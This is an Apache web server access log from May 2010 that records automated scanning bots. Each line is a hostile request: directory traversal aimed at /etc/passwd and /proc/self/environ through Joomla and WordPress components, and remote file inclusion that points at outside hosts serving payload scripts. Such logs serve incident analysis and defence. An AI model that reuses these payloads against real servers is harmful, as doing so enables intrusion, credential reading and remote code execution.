81.23.236.82 - - [30/May/2010:04:42:57 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
209.216.201.8 - - [30/May/2010:04:43:08 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.814"
67.18.167.170 - - [30/May/2010:04:43:10 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
94.198.96.3 - - [30/May/2010:04:43:24 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
94.198.96.3 - - [30/May/2010:04:43:48 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.816"
94.198.96.3 - - [30/May/2010:04:43:49 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
94.198.96.3 - - [30/May/2010:04:44:04 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
67.18.167.170 - - [30/May/2010:04:44:57 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
211.174.62.150 - - [30/May/2010:04:45:09 -0500] "GET /index.php?option=com_webtv&controller=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.174.62.150 - - [30/May/2010:04:45:09 -0500] "GET /logs/index.php?option=com_webtv&controller=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.174.62.150 - - [30/May/2010:04:45:09 -0500] "GET /logs/access_log.1271808000/index.php?option=com_webtv&controller=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.122.52.80 - - [30/May/2010:04:48:22 -0500] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?%20? HTTP/1.1" 404 333 "-""Mozilla/5.0"
222.122.52.80 - - [30/May/2010:04:48:22 -0500] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?%20? HTTP/1.1" 404 338 "-""Mozilla/5.0"
222.122.52.80 - - [30/May/2010:04:48:22 -0500] "GET /logs/access_log.1271548800/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?%20? HTTP/1.1" 404 360 "-""Mozilla/5.0"
76.12.58.212 - - [30/May/2010:04:48:24 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
76.12.58.212 - - [30/May/2010:04:48:24 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
207.46.13.134 - - [30/May/2010:04:48:27 -0500] "GET /logs/access_log.1218844800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
125.248.150.84 - - [30/May/2010:04:48:42 -0500] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?%20? HTTP/1.1" 404 338 "-""Mozilla/5.0"
125.248.150.84 - - [30/May/2010:04:48:42 -0500] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?%20? HTTP/1.1" 404 333 "-""Mozilla/5.0"
125.248.150.84 - - [30/May/2010:04:48:42 -0500] "GET /logs/access_log.1271548800/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?%20? HTTP/1.1" 404 360 "-""Mozilla/5.0"
209.216.201.8 - - [30/May/2010:04:48:49 -0500] "GET /logs/access_log.1274227200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.814"
209.216.201.8 - - [30/May/2010:04:48:49 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.814"
209.216.201.8 - - [30/May/2010:04:48:49 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.814"
222.122.52.80 - - [30/May/2010:04:49:18 -0500] "GET /logs/access_log.1270944000/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?%20? HTTP/1.1" 404 360 "-""Mozilla/5.0"
125.248.150.84 - - [30/May/2010:04:49:34 -0500] "GET /logs/access_log.1270944000/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?%20? HTTP/1.1" 404 360 "-""Mozilla/5.0"
67.227.143.132 - - [30/May/2010:04:49:35 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.227.143.132 - - [30/May/2010:04:49:35 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
209.44.120.3 - - [30/May/2010:04:50:15 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
209.44.120.3 - - [30/May/2010:04:50:15 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
209.44.120.2 - - [30/May/2010:04:50:18 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
209.44.120.2 - - [30/May/2010:04:50:18 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
75.127.70.39 - - [30/May/2010:04:51:14 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://temsen.org.tr/forum/Themes/idxx.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
75.127.70.39 - - [30/May/2010:04:51:14 -0500] "GET /logs/access_log.1273363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://temsen.org.tr/forum/Themes/idxx.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
75.127.70.39 - - [30/May/2010:04:51:14 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://temsen.org.tr/forum/Themes/idxx.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
75.127.70.39 - - [30/May/2010:04:51:15 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://temsen.org.tr/forum/Themes/idxx.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
75.127.70.39 - - [30/May/2010:04:51:15 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://temsen.org.tr/forum/Themes/idxx.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
75.127.70.39 - - [30/May/2010:04:51:15 -0500] "GET /logs/access_log.1273363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://temsen.org.tr/forum/Themes/idxx.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
211.174.62.150 - - [30/May/2010:04:51:33 -0500] "GET /index.php?option=com_webtv&controller=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.174.62.150 - - [30/May/2010:04:51:33 -0500] "GET /logs/index.php?option=com_webtv&controller=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.174.62.150 - - [30/May/2010:04:51:33 -0500] "GET /logs/access_log.1271808000/index.php?option=com_webtv&controller=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.216.201.8 - - [30/May/2010:04:51:58 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.814"
209.216.201.8 - - [30/May/2010:04:51:58 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.814"
209.216.201.8 - - [30/May/2010:04:51:58 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.814"
94.198.96.3 - - [30/May/2010:04:52:02 -0500] "GET /logs/access_log.1274227200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.816"
94.198.96.3 - - [30/May/2010:04:52:03 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
94.198.96.3 - - [30/May/2010:04:52:03 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.816"
209.216.201.8 - - [30/May/2010:04:53:04 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.814"
209.216.201.8 - - [30/May/2010:04:53:05 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.814"
209.216.201.8 - - [30/May/2010:04:53:05 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.814"
94.198.96.3 - - [30/May/2010:04:53:32 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
94.198.96.3 - - [30/May/2010:04:53:32 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
94.198.96.3 - - [30/May/2010:04:53:33 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.816"
209.216.201.8 - - [30/May/2010:04:53:50 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.814"
211.174.62.150 - - [30/May/2010:04:54:10 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.174.62.150 - - [30/May/2010:04:54:10 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.174.62.150 - - [30/May/2010:04:54:10 -0500] "GET /logs/access_log.1270771200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
89.35.219.220 - - [30/May/2010:04:54:33 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.interkor.ro/comtim/forum/idxx.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
89.35.219.220 - - [30/May/2010:04:54:33 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.interkor.ro/comtim/forum/idxx.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
89.35.219.220 - - [30/May/2010:04:54:33 -0500] "GET /logs/access_log.1273363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.interkor.ro/comtim/forum/idxx.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
89.35.219.220 - - [30/May/2010:04:54:39 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.interkor.ro/comtim/forum/idxx.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
89.35.219.220 - - [30/May/2010:04:54:39 -0500] "GET /logs/access_log.1273363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.interkor.ro/comtim/forum/idxx.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
89.35.219.220 - - [30/May/2010:04:54:39 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.interkor.ro/comtim/forum/idxx.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.174.62.150 - - [30/May/2010:04:54:44 -0500] "GET /logs/access_log.1272412800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
80.65.166.74 - - [30/May/2010:04:54:53 -0500] "GET /logs/?INCLUDE_FOLDER=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 7543 "-""Mozilla/5.0"
80.65.166.74 - - [30/May/2010:04:54:54 -0500] "GET /logs/access_log.1270512000/?INCLUDE_FOLDER=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
80.65.166.74 - - [30/May/2010:04:54:54 -0500] "GET /?INCLUDE_FOLDER=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
207.46.13.88 - - [30/May/2010:04:54:56 -0500] "GET /logs/access_log.1225411200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.198.96.3 - - [30/May/2010:04:54:57 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
67.18.167.170 - - [30/May/2010:04:55:12 -0500] "GET /logs/access_log.1274227200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
67.18.167.170 - - [30/May/2010:04:55:13 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
67.18.167.170 - - [30/May/2010:04:55:13 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
209.216.201.8 - - [30/May/2010:04:55:18 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.814"
209.216.201.8 - - [30/May/2010:04:55:18 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.814"
209.216.201.8 - - [30/May/2010:04:55:18 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.814"
219.117.209.213 - - [30/May/2010:04:55:46 -0500] "GET /logs/wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 327 "-""libwww-perl/5.805"
219.117.209.213 - - [30/May/2010:04:55:46 -0500] "GET /wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
219.117.209.213 - - [30/May/2010:04:55:57 -0500] "GET /logs/access_log.1273622400/wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.805"
219.117.209.213 - - [30/May/2010:04:55:58 -0500] "GET /wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
219.117.209.213 - - [30/May/2010:04:55:58 -0500] "GET /logs/wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 327 "-""libwww-perl/5.805"
65.49.28.194 - - [30/May/2010:04:55:58 -0500] "GET /logs/access_log.1273622400/wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.820"
65.49.28.194 - - [30/May/2010:04:55:58 -0500] "GET /wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.820"
65.49.28.194 - - [30/May/2010:04:55:59 -0500] "GET /logs/wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 327 "-""libwww-perl/5.820"
65.49.28.194 - - [30/May/2010:04:56:16 -0500] "GET /wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.820"
65.49.28.194 - - [30/May/2010:04:56:24 -0500] "GET /logs/wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 327 "-""libwww-perl/5.820"
65.49.28.194 - - [30/May/2010:04:56:24 -0500] "GET /wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.820"
219.117.209.213 - - [30/May/2010:04:56:25 -0500] "GET /wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
203.72.226.120 - - [30/May/2010:04:56:48 -0500] "GET /logs/access_log.1273622400/wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.805"
203.72.226.120 - - [30/May/2010:04:56:48 -0500] "GET /wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
203.72.226.120 - - [30/May/2010:04:56:49 -0500] "GET /logs/wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 327 "-""libwww-perl/5.805"
203.72.226.120 - - [30/May/2010:04:56:51 -0500] "GET /wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
203.72.226.120 - - [30/May/2010:04:57:02 -0500] "GET /logs/wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 327 "-""libwww-perl/5.805"
203.72.226.120 - - [30/May/2010:04:57:03 -0500] "GET /wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
81.23.236.82 - - [30/May/2010:04:57:23 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
81.23.236.82 - - [30/May/2010:04:57:23 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.23.236.82 - - [30/May/2010:04:57:23 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
80.65.166.74 - - [30/May/2010:04:57:27 -0500] "GET /logs/?INCLUDE_FOLDER=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 7543 "-""Mozilla/5.0"
80.65.166.74 - - [30/May/2010:04:57:27 -0500] "GET /logs/access_log.1270512000/?INCLUDE_FOLDER=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
80.65.166.74 - - [30/May/2010:04:57:27 -0500] "GET /?INCLUDE_FOLDER=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
67.18.167.170 - - [30/May/2010:04:57:48 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
67.18.167.170 - - [30/May/2010:04:57:48 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
67.18.167.170 - - [30/May/2010:04:57:48 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
76.12.58.212 - - [30/May/2010:04:58:29 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
76.12.58.212 - - [30/May/2010:04:58:29 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.227.143.132 - - [30/May/2010:04:58:30 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
67.227.143.132 - - [30/May/2010:04:58:30 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.18.167.170 - - [30/May/2010:04:58:40 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
67.18.167.170 - - [30/May/2010:04:58:41 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
67.18.167.170 - - [30/May/2010:04:58:41 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
81.23.236.82 - - [30/May/2010:04:58:49 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
81.23.236.82 - - [30/May/2010:04:58:49 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.23.236.82 - - [30/May/2010:04:58:50 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
209.216.201.8 - - [30/May/2010:04:59:18 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.814"
209.216.201.8 - - [30/May/2010:04:59:18 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.814"
209.216.201.8 - - [30/May/2010:04:59:18 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.814"
67.18.167.170 - - [30/May/2010:05:00:05 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
94.198.96.3 - - [30/May/2010:05:00:34 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.816"
94.198.96.3 - - [30/May/2010:05:00:34 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
94.198.96.3 - - [30/May/2010:05:00:34 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.816"
209.216.201.8 - - [30/May/2010:05:00:55 -0500] "GET /logs/access_log.1274313600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.814"
208.100.59.16 - - [30/May/2010:05:01:02 -0500] "GET /logs/access_log.1271808000/index.php?option=com_webtv&controller=http://innovativecommunitysolution.com//templates/system/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.100.59.16 - - [30/May/2010:05:01:02 -0500] "GET /index.php?option=com_webtv&controller=http://innovativecommunitysolution.com//templates/system/1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
208.100.59.16 - - [30/May/2010:05:01:02 -0500] "GET /logs/index.php?option=com_webtv&controller=http://innovativecommunitysolution.com//templates/system/1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
208.100.59.16 - - [30/May/2010:05:01:03 -0500] "GET /logs/index.php?option=com_webtv&controller=http://innovativecommunitysolution.com//templates/system/1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
208.100.59.16 - - [30/May/2010:05:01:03 -0500] "GET /logs/access_log.1271808000/index.php?option=com_webtv&controller=http://innovativecommunitysolution.com//templates/system/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.100.59.16 - - [30/May/2010:05:01:03 -0500] "GET /index.php?option=com_webtv&controller=http://innovativecommunitysolution.com//templates/system/1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
94.198.96.3 - - [30/May/2010:05:01:25 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
94.198.96.3 - - [30/May/2010:05:01:25 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
94.198.96.3 - - [30/May/2010:05:01:26 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.816"
75.127.70.39 - - [30/May/2010:05:03:24 -0500] "GET /logs/access_log.1271548800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://temsen.org.tr/forum/Themes/idxx.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
75.127.70.39 - - [30/May/2010:05:03:32 -0500] "GET /logs/access_log.1271548800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://temsen.org.tr/forum/Themes/idxx.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
75.127.70.39 - - [30/May/2010:05:03:37 -0500] "GET /logs/access_log.1271203200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://temsen.org.tr/forum/Themes/idxx.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
212.59.6.16 - - [30/May/2010:05:03:43 -0500] "GET /index.php?option=com_gcalendar&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
75.127.70.39 - - [30/May/2010:05:03:48 -0500] "GET /logs/access_log.1271203200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://temsen.org.tr/forum/Themes/idxx.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
75.127.70.39 - - [30/May/2010:05:03:49 -0500] "GET /logs/access_log.1272240000//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://temsen.org.tr/forum/Themes/idxx.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
